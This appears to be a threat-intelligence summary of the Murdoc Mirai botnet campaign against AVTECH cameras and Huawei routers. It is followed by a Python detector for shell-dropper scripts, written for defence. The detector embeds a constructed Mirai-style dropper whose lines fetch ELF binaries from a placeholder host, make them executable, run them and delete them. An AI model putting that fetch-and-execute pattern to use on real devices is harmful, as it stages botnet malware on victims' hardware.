The Qualys Threat Research Unit has uncovered a large-scale operation within the Mirai campaign, dubbed Murdoc Botnet. This variant exploits vulnerabilities in AVTECH cameras and Huawei HG532 routers, showing enhanced capabilities for compromising devices and building large botnets. The campaign, active since July 2024, deploys the botnet sample through ELF binaries and shell scripts. Over 1300 IPs were found active, with 100+ distinct sets of servers distributing the malware. The botnet targets vulnerable devices using existing exploits for CVE-2024-7029 (AVTECH cameras) and CVE-2017-17215 (Huawei HG532 routers). Affected countries include Malaysia, Thailand, Mexico, and Indonesia. On a compromised device, the malware uses shell scripts to fetch a payload, execute it, and then remove it from disk.
Author: AlienVault
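The fetch / execute / remove loop mentioned above is the classic Mirai dropper pattern: a shell script tries one architecture-specific ELF after another, runs each, and deletes it so the binary never stays on disk. The following heuristic detector is an added example written for this page; it is not code from Qualys, AlienVault or the Murdoc campaign. The dropper script it analyzes is constructed for illustration (the host `example.invalid`, the `bins/` path and the filenames are placeholders, not indicators from the campaign), and the function and class names are this example's own.

```python
"""Heuristic detector for the fetch / chmod / execute / remove loop that
Mirai-style shell droppers use to stage ELF payloads on a compromised device."""
from __future__ import annotations

import re
from dataclasses import dataclass, field

# Constructed sample in the style of a Mirai dropper. This is NOT a sample from
# the Murdoc campaign; the host, paths and filenames are placeholders.
SAMPLE_DROPPER = """#!/bin/sh
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://example.invalid/bins/x86; chmod +x x86; ./x86 router; rm -rf x86
wget http://example.invalid/bins/arm7; chmod +x arm7; ./arm7 router; rm -rf arm7
curl -O http://example.invalid/bins/mips; chmod 777 mips; ./mips router; rm -rf mips
"""

# Constructed benign script for comparison: it removes files but never fetches
# and executes them, so it must not trigger the detector.
BENIGN_SCRIPT = """#!/bin/sh
cd /var/log
gzip -f messages.1
rm -f messages.2.gz
"""

FETCHERS = {"wget", "curl", "tftp", "ftpget"}
SEPARATORS = re.compile(r"\s*(?:;|&&|\|\|)\s*")


def split_commands(script: str) -> list[list[str]]:
    """Split a script into argv lists, honouring ';', '&&' and '||' on one line."""
    commands = []
    for line in script.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        for part in SEPARATORS.split(line):
            if part:
                commands.append(part.split())
    return commands


def fetched_name(argv: list[str]) -> str | None:
    """Best-effort name of the file a wget/curl/tftp command writes to disk."""
    # Explicit output file: wget -O name / curl -o name / tftp -r name.
    for flag in ("-O", "-o", "-r"):
        if flag in argv[1:-1]:
            candidate = argv[argv.index(flag) + 1]
            if not candidate.startswith("-") and "://" not in candidate:
                return candidate
    # Otherwise the basename of the last URL-like argument.
    for tok in reversed(argv[1:]):
        if "://" in tok or "/" in tok:
            return tok.rstrip("/").rsplit("/", 1)[-1]
    return None


@dataclass
class DropperVerdict:
    fetched: set[str] = field(default_factory=set)
    chmodded: set[str] = field(default_factory=set)
    executed: set[str] = field(default_factory=set)
    removed: set[str] = field(default_factory=set)

    @property
    def chains(self) -> list[str]:
        """Files that were fetched, executed and then removed (chmod is optional)."""
        return sorted(self.fetched & self.executed & self.removed)

    @property
    def is_dropper(self) -> bool:
        return bool(self.chains)


def analyze_script(script: str) -> DropperVerdict:
    """Track each filename through the fetch -> chmod -> ./run -> rm stages."""
    verdict = DropperVerdict()
    for argv in split_commands(script):
        cmd = argv[0]
        if cmd in FETCHERS:
            name = fetched_name(argv)
            if name:
                verdict.fetched.add(name)
        elif cmd == "chmod":
            # Every non-flag argument after the mode is a target.
            verdict.chmodded.update(a for a in argv[2:] if not a.startswith("-"))
        elif cmd == "rm":
            verdict.removed.update(a for a in argv[1:] if not a.startswith("-"))
        elif cmd.startswith("./"):
            verdict.executed.add(cmd[2:])
    return verdict


if __name__ == "__main__":
    for label, text in (("dropper", SAMPLE_DROPPER), ("benign", BENIGN_SCRIPT)):
        v = analyze_script(text)
        print(f"{label}: is_dropper={v.is_dropper} chains={v.chains}")
```

The detector deliberately keys on the full chain rather than on any single command: `wget` plus `rm` appears in plenty of legitimate install scripts, but fetching a file, executing it from the current directory and immediately deleting it is the behaviour that matters. Extending it to other fetch tools or to `sh name` style execution is a matter of adding to `FETCHERS` and the execute branch.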
Related Tags:
Malaysia
Thailand
Mexico
Indonesia
Mirai
T1133
IoT
T1498
botnet
Associated Indicators: